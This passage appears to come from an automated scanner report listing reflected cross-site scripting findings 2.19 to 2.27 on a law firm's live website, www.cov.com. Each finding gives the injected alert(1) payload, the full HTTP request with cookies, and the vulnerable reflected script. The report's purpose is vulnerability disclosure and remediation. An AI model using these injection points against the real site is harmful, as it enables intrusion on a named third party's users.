Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /honorsrankings?f4088'-alert(1)-'6fb7096a36d=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:42:42 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1145; path=/
Set-Cookie: PortletId=1136501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 18735


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Honors & Rankings</title>
<meta name="language
...[SNIP]...
ent.aspnetForm.action = '/honorsrankings/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/honorsrankings/AboutSection.aspx?f4088'-alert(1)-'6fb7096a36d=1';//]]>
...[SNIP]...

2.19. http://www.cov.com/leadersindiversity [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /leadersindiversity

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1cac5'-alert(1)-'90719ebe248 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /leadersindiversity?1cac5'-alert(1)-'90719ebe248=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:45:44 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1152; path=/
Set-Cookie: PortletId=1143501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14970


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Diversity | Leaders in Diversity</title>
<meta
...[SNIP]...
spnetForm.action = '/leadersindiversity/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/leadersindiversity/Diversity.aspx?1cac5'-alert(1)-'90719ebe248=1';//]]>
...[SNIP]...

2.20. http://www.cov.com/legalnotices [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /legalnotices

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0792'-alert(1)-'83d5d12175f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /legalnotices?a0792'-alert(1)-'83d5d12175f=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:42:36 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1165; path=/
Set-Cookie: PortletId=1156501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14448


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Legal Notices</title>
<meta name="language" co
...[SNIP]...
ment.aspnetForm.action = '/legalnotices/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/legalnotices/GeneralPageData.aspx?a0792'-alert(1)-'83d5d12175f=1';//]]>
...[SNIP]...

2.21. http://www.cov.com/mclarty [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /mclarty

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 354a9'-alert(1)-'6c85014edb2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mclarty?354a9'-alert(1)-'6c85014edb2=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:44:27 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1407; path=/
Set-Cookie: PortletId=4044201; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 15876


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | McLarty Associates</title>
<meta name="languag
...[SNIP]...
[CDATA[
document.aspnetForm.action = '/mclarty/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/mclarty/AboutSection.aspx?354a9'-alert(1)-'6c85014edb2=1';//]]>
...[SNIP]...

2.22. http://www.cov.com/news/detail.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /news/detail.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b350e'-alert(1)-'c5433843e1a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/detail.aspx?b350e'-alert(1)-'c5433843e1a=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:41:56 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1158; path=/
Set-Cookie: PortletId=1149501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10881


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP</title>
<meta name="language" content="7483b893-
...[SNIP]...
<![CDATA[
document.aspnetForm.action = '/news/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/news/detail.aspx?b350e'-alert(1)-'c5433843e1a=1';//]]>
...[SNIP]...

2.23. http://www.cov.com/news/detail.aspx [news parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /news/detail.aspx

Issue detail

The value of the news request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9eb11'-alert(1)-'81ed8e1df91 was submitted in the news parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/detail.aspx?news=15409eb11'-alert(1)-'81ed8e1df91 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:40:51 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1158; path=/
Set-Cookie: PortletId=1149501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10909


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP</title>
<meta name="language" content="7483b893-
...[SNIP]...
<![CDATA[
document.aspnetForm.action = '/news/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/news/detail.aspx?news=15409eb11'-alert(1)-'81ed8e1df91';//]]>
...[SNIP]...

2.24. http://www.cov.com/newsandevents [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /newsandevents

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f75a8'-alert(1)-'99f649b592f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /newsandevents?f75a8'-alert(1)-'99f649b592f=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:36:54 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1157; path=/
Set-Cookie: PortletId=1148501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 144156


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | News & Events</title>
<meta name="language" co
...[SNIP]...
ent.aspnetForm.action = '/newsandevents/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/newsandevents/NewsEventsPubs.aspx?f75a8'-alert(1)-'99f649b592f=1';//]]>
...[SNIP]...

2.25. http://www.cov.com/offices [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /offices

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c98b'-alert(1)-'fd3b25fecf2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /offices?2c98b'-alert(1)-'fd3b25fecf2=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:45:49 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1161; path=/
Set-Cookie: PortletId=1152501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 78699


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Offices</title>
<meta name="language" content=
...[SNIP]...
<![CDATA[
document.aspnetForm.action = '/offices/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/offices/List.aspx?2c98b'-alert(1)-'fd3b25fecf2=1';//]]>
...[SNIP]...

2.26. http://www.cov.com/practice [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /practice

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4da1'-alert(1)-'610b8b730dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /practice?f4da1'-alert(1)-'610b8b730dc=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:36:08 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1142; path=/
Set-Cookie: PortletId=1133501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 247989


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Practices, Industries & Regions</title>
<meta
...[SNIP]...
<![CDATA[
document.aspnetForm.action = '/practice/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/practice/Services.aspx?f4da1'-alert(1)-'610b8b730dc=1';//]]>
...[SNIP]...

2.27. http://www.cov.com/practice/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /practice/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c53e5'-alert(1)-'9529b8f7a51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /practice/?c53e5'-alert(1)-'9529b8f7a51=1 HTTP/1.1
Host: www.cov.com
Proxy-Connection: keep-alive
Referer: http://www.cov.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
